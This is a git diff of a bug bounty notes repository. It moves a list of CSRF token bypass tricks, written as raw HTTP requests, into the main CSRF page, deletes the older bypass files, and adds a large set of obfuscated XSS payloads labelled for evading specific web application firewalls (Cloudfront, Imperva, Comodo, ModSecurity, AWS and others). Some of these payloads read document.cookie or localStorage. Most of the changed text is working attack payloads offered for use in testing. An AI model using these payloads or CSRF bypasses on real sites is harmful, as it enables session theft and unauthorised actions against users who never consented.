diff --git a/Bypass/Bypass 304.md b/Bypass/Bypass 304.md
deleted file mode 100644
index 21b62cc..0000000
--- a/Bypass/Bypass 304.md	
+++ /dev/null
@@ -1,30 +0,0 @@
-# Bypass 304 (Not Modified)
-
-1. Delete "If-None-Match" header
-```
-GET /admin HTTP/1.1
-Host: target.com
-If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
-```
-Try this to bypass
-```
-GET /admin HTTP/1.1
-Host: target.com
-```
-
-2. Adding random character in the end of "If-None-Match" header
-```
-GET /admin HTTP/1.1
-Host: target.com
-If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
-```
-Try this to bypass
-```
-GET /admin HTTP/1.1
-Host: target.com
-Host: target.com
-If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b
-```
-
-## References
-* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)
diff --git a/Bypass/Bypass CSRF.md b/Bypass/Bypass CSRF.md
deleted file mode 100644
index f6bde6b..0000000
--- a/Bypass/Bypass CSRF.md	
+++ /dev/null
@@ -1,120 +0,0 @@
-# Bypass CSRF
-
-1. Change single character
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
-```
-Try this to bypass
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
-```
-
-2. Sending empty value of token
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
-```
-Try this to bypass
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=
-```
-
-3. Replace the token with same length
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=aaaaaa
-```
-Try this to bypass
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=aaabaa
-```
-4. Changing POST / GET method
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
-```
-Try this to bypass
-```
-GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
-Host: target.com
-...
-```
-
-5. Remove the token from request
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
-```
-Try this to bypass
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456
-```
-
-6. Use another user's valid token
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
-```
-
-7. Try to decrypt hash
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=MTIzNDU2
-```
-MTIzNDU2 => 123456 with base64
-
-8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=vi802jg9f8akd9j123
-```
-When we register again, the request like this
-```
-POST /register HTTP/1.1
-Host: target.com
-...
-
-username=dapos&password=123456&token=vi802jg9f8akd9j124
-```
-If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
diff --git a/Cross Site Request Forgery.md b/Cross Site Request Forgery.md
index 2fcdafe..87f86f7 100644
--- a/Cross Site Request Forgery.md	
+++ b/Cross Site Request Forgery.md	
@@ -4,7 +4,7 @@
 Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
 
 ## Where to find
-Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
+Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack.
 
 ## How to exploit
 1. HTML GET Method
@@ -92,4 +92,126 @@ xhr.send('{"role":admin}');
     </form>
 <br>
 </body>
-```
\ No newline at end of file
+```
+
+# Bypass CSRF Token
+But in some cases, even though there is a CSRF token on the form on the website. CSRF tokens can still be bypassed by doing a few things:
+
+1. Change single character
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
+```
+
+2. Sending empty value of token
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=
+```
+
+3. Replace the token with same length
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=aaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=aaabaa
+```
+4. Changing POST / GET method
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
+Host: target.com
+...
+```
+
+5. Remove the token from request
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456
+```
+
+6. Use another user's valid token
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
+```
+
+7. Try to decrypt hash
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=MTIzNDU2
+```
+MTIzNDU2 => 123456 with base64
+
+8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=vi802jg9f8akd9j123
+```
+When we register again, the request like this
+```
+POST /register HTTP/1.1
+Host: target.com
+...
+
+username=dapos&password=123456&token=vi802jg9f8akd9j124
+```
+If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md
index 1109185..59b1ecc 100644
--- a/Cross Site Scripting.md	
+++ b/Cross Site Scripting.md	
@@ -344,31 +344,22 @@ javascript://%250Aalert(1)
 ```
 <svg%0Aonauxclick=0;[1].some(confirm)//
 
-<svg onload=alert%26%230000000040"")>
+<svg/onload={alert`1`}>
 
 <a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>
-<svg onx=() onload=(confirm)(1)>
-
-<svg onx=() onload=(confirm)(document.cookie)>
-
-<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
-
-Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
 
 "><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
 
-Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
-
 "><onx=[] onmouseover=prompt(1)>
 
-%2sscript%2ualert()%2s/script%2u -xss popup
-
-<svg onload=alert%26%230000000040"1")>
+%2sscript%2ualert()%2s/script%2u
 
 "Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
 
 [1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt&lpar;1&rpar;prompt&#40;1&#41;prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
 
+<svg onload=alert%26%230000000040"1")>
+
 <svg onload=prompt%26%230000000040document.domain)>
 
 <svg onload=prompt%26%23x000000028;document.domain)>
@@ -379,11 +370,84 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
 
 <a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
 
+<img ignored=() src=x onerror=prompt(1)>
+
+<svg onx=() onload=(confirm)(1)>
+
+<--`<img/src=` onerror=confirm``> --!>
+
+<img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">
+
+<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
+
+'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
+
+'"><img/src/onerror=.1|alert``>
+
 :javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
 
-<img ignored=() src=x onerror=prompt(1)>
+Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
 ```
 
+2. Cloudfront
+```
+">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
+
+<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
+
+"><--<img+src= "><svg/onload+alert(document.domain)>> --!>
+```
+
+3. Cloudbric
+```
+<a69/onclick=[1].findIndex(alert)>pew
+```
+
+4. Comodo WAF
+```
+<input/oninput='new Function`confir\u006d\`0\``'>
+
+<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
+```
+
+5. ModSecurity
+```
+<a href="jav%0Dascript&colon;alert(1)">
+```
+
+6. Imperva
+```
+<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
+
+<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme
+
+<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
+
+<a69/onclick=write&lpar;&rpar;>pew
+
+<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
+
+<svg onload\r\n=$.globalEval("al"+"ert()");>
+
+<svg/onload=self[`aler`%2b`t`]`1`>
+
+%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
+
+<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
+
+<img/src=q onerror='new Function`al\ert\`1\``'>
+
+<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
+```
+
+7. AWS
+```
+<script>eval(atob(decodeURIComponent(confirm`1`)))</script>
+```
+
+If you want to see the other payload for other WAF, check this [link](https://github.com/0xInfection/Awesome-WAF)
+
 ## References
 - [Brute Logic](https://brutelogic.com.br/)
+- [Awesome-WAF](https://github.com/0xInfection/Awesome-WAF)
 - Some random twitter posts
\ No newline at end of file
diff --git a/README.md b/README.md
index 654b280..096a605 100644
--- a/README.md
+++ b/README.md
@@ -22,7 +22,9 @@ These are my bug bounty notes that I have gathered from various sources, you can
 - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
 - [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
 - [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
+- [Server Side Request Forgery](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Request%20Forgery.md)
 - SQL Injection (SOON)
+- [Web Cache Deception](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Deception.md)
 - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
 
 ## Checklist
@@ -32,10 +34,8 @@ These are my bug bounty notes that I have gathered from various sources, you can
 ## List Bypass
 - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
 - [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
-- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
 - [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
 - [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
-- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
 
 ## Miscellaneous
 - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
@@ -50,11 +50,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
 - [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
 - [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
 - [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
+- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
 - [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
 - [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md)
-- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
-- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
 - [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
+- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
 - [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
 - [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
 - [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
@@ -69,5 +69,5 @@ These are my bug bounty notes that I have gathered from various sources, you can
 - [ ] Tidy up the reconnaisance folder
 - [ ] Seperate the bypass from some vulnerability readme
 - [ ] Writes multiple payload bypasses for each vulnerability
-  - [ ] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
+  - [x] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
   - [ ] Payload SQL injection for each WAF (Cloudflare, Cloudfront)
\ No newline at end of file